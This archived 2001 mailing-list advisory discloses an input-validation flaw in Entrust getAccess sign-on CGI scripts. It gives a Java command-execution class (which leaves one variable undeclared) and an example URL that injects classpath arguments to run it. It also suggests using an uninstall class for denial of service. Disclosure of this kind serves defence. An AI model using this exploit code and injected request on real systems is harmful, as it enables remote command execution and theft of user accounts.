OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: rudi carell (rudicarellhotmail.com)
Date: Fri Jul 27 2001 - 11:33:54 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    hola friends,

    getAccess[tm] is used as a single-sign-on system often used for large
    internet-portals.

    --- snip (http://www.entrust.com) ---

    Entrust GetAccess[tm] offers the most comprehensive solution for
    consistently deploying and enforcing
    basic and enhanced security across online applications, from Web browsers,
    to enterprise applications and
    legacy database systems.

    --- snip ---

    problem description:

    due to missing input-validation it is possible to run(start) java-programs
    on the "getaccess"-machine.
    combined with public accessibly uploads or any other possibility to create
    class-files on the server this vulnerability c
    ould be used to run arbitrary system commands on the target machine( or
    change getAccess parameters and steal any user ac
    count you want BTW).

    it should also be possible(but not proven yet) to exploit default-,install-
    or demo classes within Java or getAccess whic
    h would make the file-upload(creation) part unneeded!
    (uninstall.class is very likely an effective DOS)

    Example:

    find exploitable getAccess-class(one which accepts params!) or upload a
    "command" programm:

    --- cut here (example cmd.java) ---

    import java.io.*;
    public class cmd {
    public static void main(String args[]) {
    s = null;
    try {
    Process p = Runtime.getRuntime().exec(args[0]+" "+args[1]);
    BufferedReader stdInput = new BufferedReader(new
    InputStreamReader(p.getInputStream()));
    BufferedReader stdError = new BufferedReader(new
    InputStreamReader(p.getErrorStream()));
    System.out.println("Content-type: text/html\n\n");
    while ((s = stdInput.readLine()) != null) { System.out.println(s); }
    while ((s = stdError.readLine()) != null) { System.out.println(s); }
    System.exit(0);
    }
    catch (IOException e) { e.printStackTrace(); System.exit(-1); }
    } }

    --- cut here ---

    later then .. a http-request to :

    http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi

    .. will run "/whereever/cmd.class" and execute "/bin/ls -alsi"

    Summary:

    object: *.gas.bat (all the getAccess cgi-shell-scripts)
    class: input validation
    remote: yes

    vendor: has been informed with a separate e-mail ( entrustentrust.com )

    (and BTW. i would NEVER EVER recommand to use shell-scripts for
    authentication purposes!)

    nice day,

    rC

    rudicarellhotmail.com
    securityfreefly.com
    http://www.freefly.com/security/

    _________________________________________________________________
    Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp